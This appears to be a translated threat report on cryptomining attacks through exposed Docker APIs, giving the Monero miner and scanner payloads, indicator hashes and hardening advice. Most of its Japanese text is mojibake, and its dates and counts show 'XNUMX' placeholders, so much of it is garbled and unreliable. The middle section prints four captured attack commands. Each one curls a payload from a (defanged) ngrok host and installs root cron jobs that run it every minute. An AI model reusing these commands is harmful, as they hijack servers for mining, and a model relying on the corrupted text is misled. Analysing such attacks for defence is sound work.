ç§ãã¡ã¯ãè åšã远跡ããããã«äœæãããããŒããã ã³ã³ããã䜿çšããŠåéãããããŒã¿ãåæããŸããã ãŸããDocker Hub äžã®ã³ãã¥ããã£å ¬éã€ã¡ãŒãžã䜿çšããŠãäžæ£ãªã³ã³ãããšããŠãããã€ããããæãŸãããªãããŸãã¯æªæ¿èªã®æå·é貚ãã€ããŒã«ããé倧ãªã¢ã¯ãã£ããã£ãæ€åºããŸããã ãã®ã€ã¡ãŒãžã¯ãæªæã®ããä»®æ³é貚ãã€ããŒãé ä¿¡ãããµãŒãã¹ã®äžéšãšããŠäœ¿çšãããŸãã
ããã«ããªãŒãã³ãªé£æ¥ããã³ã³ãããŒãã¢ããªã±ãŒã·ã§ã³ã«äŸµå ¥ããããã«ããããã¯ãŒã¯ãæäœããããã®ããã°ã©ã ãã€ã³ã¹ããŒã«ãããŸãã
ãããŒãããããã®ãŸãŸãã€ãŸãããã©ã«ãèšå®ã®ãŸãŸã«ããã»ãã¥ãªãã£å¯Ÿçããã®åŸã®è¿œå ãœãããŠã§ã¢ã®ã€ã³ã¹ããŒã«ã¯è¡ããŸããã Docker ã«ã¯ããšã©ãŒãåçŽãªè匱æ§ãåé¿ããããã®åæã»ããã¢ããã«é¢ããæšå¥šäºé ãããããšã«æ³šæããŠãã ããã ãã ãã䜿çšããããããŒãããã¯ã³ã³ããã§ãããã³ã³ããå ã®ã¢ããªã±ãŒã·ã§ã³ã§ã¯ãªããã³ã³ããåãã©ãããã©ãŒã ãçã£ãæ»æãæ€åºããããã«èšèšãããŠããŸãã
æ€åºãããæªæã®ããã¢ã¯ãã£ããã£ã¯ãè匱æ§ãå¿ èŠãšãããDocker ã®ããŒãžã§ã³ã«ãäŸåããªãããã泚ç®ã«å€ããŸãã æ»æè ãå€æ°ã®ãªãŒãã³ ãµãŒããŒã«ææããããã«å¿ èŠãªã®ã¯ãæ£ããæ§æãããŠããªããªãŒãã³ãªã³ã³ãã ã€ã¡ãŒãžãèŠã€ããããšã ãã§ãã
éã¯ããŒãºãã® Docker API ã䜿çšãããšããŠãŒã¶ãŒã¯ããŸããŸãªåŠçãå®è¡ã§ããŸãã
å·ŠåŽã¯ãã«ãŠã§ã¢ã®é
ä¿¡æ¹æ³ã§ãã å³åŽã¯æ»æè
ã®ç°å¢ã§ãã€ã¡ãŒãžã®ãªã¢ãŒãããŒã«ã¢ãŠããå¯èœã«ããŸãã
3762 ã®ãªãŒãã³ Docker API ã®åœå¥ã®ååžã 12.02.2019 幎 XNUMX æ XNUMX æ¥ä»ãã® Shodan æ€çŽ¢ã«åºã¥ã
æ»æãã§ãŒã³ãšãã€ããŒãã®ãªãã·ã§ã³
æªæã®ããã¢ã¯ãã£ããã£ã¯ãããŒãããã®å©ãã ãã§æ€åºãããããã§ã¯ãããŸããã Shodan ããã®ããŒã¿ã¯ãMonero æå·é貚ãã€ãã³ã° ãœãããŠã§ã¢ããããã€ããããã®ããªããžãšããŠäœ¿çšãããæ§æãééã£ãŠããã³ã³ããã調æ»ããŠä»¥æ¥ãå
¬éãããŠãã Docker API (2018 çªç®ã®ã°ã©ããåç
§) ã®æ°ãå¢å ããŠããããšã瀺ããŠããŸãã æšå¹ŽXNUMXæïŒXNUMX幎çŸåšããŒã¿ïŒ
ãããŒãããã®ãã°ã調æ»ãããšãããã³ã³ãã㌠ã€ã¡ãŒãžã®äœ¿çšãã
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
ã芧ã®ãšãããã¢ããããŒãããããã¡ã€ã«ã¯åžžã«å€åãã URL ããããŠã³ããŒããããŸãã ãããã® URL ã®æå¹æéã¯çããããæå¹æéãéãããšãã€ããŒããããŠã³ããŒãã§ããªããªããŸãã
ãã€ããŒã ãªãã·ã§ã³ã¯ XNUMX ã€ãããŸãã XNUMX ã€ç®ã¯ããã€ãã³ã° ããŒã«ã«æ¥ç¶ãã Linux çšã«ã³ã³ãã€ã«ããã ELF ãã€ã㌠(Coinminer.SH.MALXMR.ATNO ãšããŠå®çŸ©) ã§ãã XNUMX ã€ç®ã¯ããããã¯ãŒã¯ç¯å²ãã¹ãã£ã³ããŠæ°ããã¿ãŒã²ãããæ€çŽ¢ããããã«äœ¿çšãããç¹å®ã®ãããã¯ãŒã¯ ããŒã«ãååŸããããã«èšèšãããã¹ã¯ãªãã (TrojanSpy.SH.ZNETMAP.A) ã§ãã
ãããã㌠ã¹ã¯ãªãã㯠XNUMX ã€ã®å€æ°ãèšå®ãããããã¯æå·é貚ãã€ããŒã®ãããã€ã«äœ¿çšãããŸãã HOST å€æ°ã«ã¯æªæã®ãããã¡ã€ã«ãé 眮ãããŠãã URL ãå«ãŸããŠãããRIP å€æ°ã¯ãããã€ããããã€ããŒã®ãã¡ã€ã«å (å®éã«ã¯ããã·ã¥) ã§ãã HOST å€æ°ã¯ãããã·ã¥å€æ°ãå€æŽããããã³ã«å€æŽãããŸãã ãã®ã¹ã¯ãªããã¯ãæ»æããããµãŒããŒäžã§ä»ã®ä»®æ³é貚ãã€ããŒãå®è¡ãããŠããªãããšã確èªããããšããŸãã
HOST å€æ°ãš RIP å€æ°ã®äŸãããã³ä»ã®ãã€ããŒãå®è¡ãããŠããªãããšã確èªããããã«äœ¿çšãããã³ãŒã ã¹ãããã
ãã€ããŒãéå§ããåã«ããã€ããŒã®ååã nginx ã«å€æŽãããŸãã ãã®ã¹ã¯ãªããã®ä»ã®ããŒãžã§ã³ã§ã¯ããã€ããŒã®ååã Linux ç°å¢ã«ååšããå¯èœæ§ã®ããä»ã®æ£èŠã®ãµãŒãã¹ã«å€æŽãããŸãã éåžžãå®è¡äžã®ããã»ã¹ã®ãªã¹ãã«å¯Ÿãããã§ãã¯ããã€ãã¹ããã«ã¯ãããã§ååã§ãã
æ€çŽ¢ã¹ã¯ãªããã«ãæ©èœããããŸãã åã URL ãµãŒãã¹ãšé£æºããŠå¿ èŠãªããŒã«ãå±éããŸãã ãã®äžã«ã¯ããããã¯ãŒã¯ãã¹ãã£ã³ããŠéããŠããããŒãã®ãªã¹ããååŸããããã«äœ¿çšããã zmap ãã€ããªããããŸãã ãã®ã¹ã¯ãªããã¯ãèŠã€ãã£ããµãŒãã¹ãšå¯Ÿè©±ãããµãŒãã¹ãããããŒãåä¿¡ããŠââãèŠã€ãã£ããµãŒãã¹ã«é¢ããè¿œå æ å ± (ããŒãžã§ã³ãªã©) ã確èªããããã«äœ¿çšãããå¥ã®ãã€ããªãèªã¿èŸŒã¿ãŸãã
ãã®ã¹ã¯ãªããã§ã¯ãã¹ãã£ã³ããããã€ãã®ãããã¯ãŒã¯ç¯å²ãäºåã«æ±ºå®ãããŸãããããã¯ã¹ã¯ãªããã®ããŒãžã§ã³ã«ãã£ãŠç°ãªããŸãã ãŸããã¹ãã£ã³ãå®è¡ããåã«ããµãŒãã¹ (ãã®å Žå㯠Docker) ããã¿ãŒã²ãã ããŒããèšå®ããŸãã
å¯èœæ§ã®ããã¿ãŒã²ãããèŠã€ãããšããã«ããããŒãèªåçã«åé€ãããŸãã ãã®ã¹ã¯ãªããã¯ã察象ã®ãµãŒãã¹ãã¢ããªã±ãŒã·ã§ã³ãã³ã³ããŒãã³ãããŸãã¯ãã©ãããã©ãŒã ã«å¿ããŠã¿ãŒã²ããããã£ã«ã¿ãªã³ã°ããŸã: RedisãJenkinsãDrupalãMODXã
次㮠XNUMX ã€ã®ã³ãŒãã§ãããããã«ãæ»æãã¯ãã«ã¯ Docker ã€ã¡ãŒãžã§ãã
äžéšã¯æ£èŠã®ãµãŒãã¹ãžã®ååå€æŽãäžéšã¯ãããã¯ãŒã¯ã®ã¹ãã£ã³ã« zmap ã䜿çšãããæ¹æ³ã瀺ããŠããŸãã
äžéšã«ã¯äºåå®çŸ©ããããããã¯ãŒã¯ç¯å²ããããäžéšã«ã¯ Docker ãªã©ã®ãµãŒãã¹ãæ€çŽ¢ããããã®ç¹å®ã®ããŒãããããŸãã
ã¹ã¯ãªãŒã³ã·ã§ããã¯ãã¢ã«ãã€ã³ ã«ãŒã«ã®ç»åã 10 äžå以äžããŠã³ããŒããããããšã瀺ããŠããŸã
Alpine Linux ãšãããŸããŸãªãããã³ã«ãä»ããŠãã¡ã€ã«ã転éããããã®ãªãœãŒã¹å¹çã®é«ã CLI ããŒã«ã§ããcurl ã«åºã¥ããŠã
ãã®ã€ã¡ãŒãž (alpine-curl) èªäœã¯æªæã®ãããã®ã§ã¯ãããŸããããäžã§èŠãããã«ãæªæã®ããæ©èœãå®è¡ããããã«äœ¿çšãããå¯èœæ§ãããããšã«æ³šæããããšãéèŠã§ãã åæ§ã® Docker ã€ã¡ãŒãžã䜿çšããŠãæªæã®ããã¢ã¯ãã£ããã£ãå®è¡ããããšãã§ããŸãã ç§ãã¡ã¯ Docker ã«é£çµ¡ãããã®åé¡ã«ã€ããŠååããŸããã
æèš
ãã®èšäºã§èª¬æããäºä»¶ã¯ã次ã®æšå¥šäºé ãå«ããæåããå®å šãèæ ®ããå¿ èŠæ§ã匷調ããŠããŸãã
- ã·ã¹ãã 管çè ããã³éçºè ã®å Žå: API èšå®ãåžžã«ãã§ãã¯ããŠãç¹å®ã®ãµãŒããŒãŸãã¯å éšãããã¯ãŒã¯ããã®ãªã¯ãšã¹ãã®ã¿ãåãå ¥ããããã«ãã¹ãŠãæ§æãããŠããããšã確èªããŠãã ããã
- æå°æš©éã®ååã«åŸããŸããã³ã³ãã ã€ã¡ãŒãžã眲åããã³æ€èšŒãããŠããããšã確èªããéèŠãªã³ã³ããŒãã³ã (ã³ã³ããèµ·åãµãŒãã¹) ãžã®ã¢ã¯ã»ã¹ãå¶éãããããã¯ãŒã¯æ¥ç¶ã«æå·åãè¿œå ããŸãã
- åŸã
æšå¥šäºé ã»ãã¥ãªãã£ã¡ã«ããºã ãæå¹ã«ããŸããããã«ãŒãã ãããŠå èµã®ã»ãã¥ãªãã£æ©èœ . - ã©ã³ã¿ã€ã ãšã€ã¡ãŒãžã®èªåã¹ãã£ã³ã䜿çšããŠãã³ã³ããå ã§å®è¡ãããŠããããã»ã¹ã«é¢ããè¿œå æ å ±ãååŸããŸã (ã¹ããŒãã£ã³ã°ã®æ€åºãè匱æ§ã®æ€çŽ¢ãªã©)ã ã¢ããªã±ãŒã·ã§ã³å¶åŸ¡ãšæŽåæ§ç£èŠã¯ããµãŒããŒããã¡ã€ã«ãããã³ã·ã¹ãã é åã«å¯Ÿããç°åžžãªå€æŽã远跡ããã®ã«åœ¹ç«ã¡ãŸãã
ãã¬ã³ããã€ã¯ãã¯ãDevOps ããŒã ãå®å
šã«æ§ç¯ããè¿
éã«å±éããã©ãã§ãèµ·åã§ããããã«æ¯æŽããŸãã ãã¬ã³ããã€ã¯ã
劥åã®å å
é¢é£ããããã·ã¥:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Ðа
åºæïŒ habr.com